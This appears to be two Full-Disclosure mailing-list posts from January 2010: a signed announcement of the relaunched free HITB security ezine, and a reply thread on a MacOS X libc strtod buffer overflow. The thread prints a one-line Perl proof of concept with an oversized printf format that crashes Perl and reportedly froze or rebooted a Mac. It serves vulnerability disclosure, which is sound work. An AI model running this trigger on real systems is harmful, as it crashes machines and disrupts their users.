-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Welcome to 2010! We are proud to announce the immediate availability of our newly ?reborn? HITB ezine! You can grab your digital copies here: https://www.hackinthebox.org/misc/HITB-Ezine-Issue-001.pdf As some of you may know, we?ve previously had an ezine that used to be published monthly, however the birth of the HIT- BSecConf conference series has kept us too busy to continue working on it. Until now that is... As with our conference series, the main purpose of this new format ezine is to provide security researchers a technical outlet for them to share their knowledge with the security community. We want these researchers to gain further recog- nition for their hard work and we have no doubt the security community will find the material beneficial to them. We have decided to make the ezine available for free in the continued spirit of HITB in ?Keeping Knowledge Free?. In addi- tion to the freely available PDF downloads, combined editions of the magazine will be printed in limited quantities for distri- bution at the various HITBSecConf?s around the world - Dubai, Amsterdam and Malaysia. We aim to only print somewhere between 100 or 200 copies (maybe less) per conference so be sure to grab a copy when they come out! Happy New Year once again and we hope you enjoy the zine! Zarul Shahrin - zarulshah...@hackinthebox.org Editor, HITB Ezine -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.11 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktLfsMACgkQbMY1K865PtEUrQCdHtkPdSKOPdMdT7LiM3iZjVkT 48cAnRiORfFMcBu+my4KuVTi42SGO5fe =nqGp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
I have not checked this issue in macos 10.4. In MacOS 10.1 does not work. But the perl script (in macos 10.5) Chujwamwmuzg.pl --- #!/usr/local/bin/perl printf % 0.4194310f, 0x0.0x41414141; Chujwamwmuzg.pl --- will crash with esi = 0x41414141 edi = 0x15 Other bugs in libc also work on new versions of macos. Example overflow in FTSENT structure http://securityreason.com/achievement_securityalert/60 http://securityreason.com/achievement_securityalert/68 We confirmed this issue in MacOS 10.1. Joshua Levitsky wrote: and it then rebooted my mac :) On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky jlevi...@joshie.com mailto:jlevi...@joshie.com wrote: The below hosed my terminal session on 10.4.11... I did this in a console login so don't have the results.. You need? or is dropping me to a blue screen and lack of system response good? #!/usr/local/bin/perl printf %0.4194310f, 0x0.0x41414141; Perl will crash with esi = 0x41414141 edi = 0x15 -Josh -- Best Regards, pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) c...@securityreason.com sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/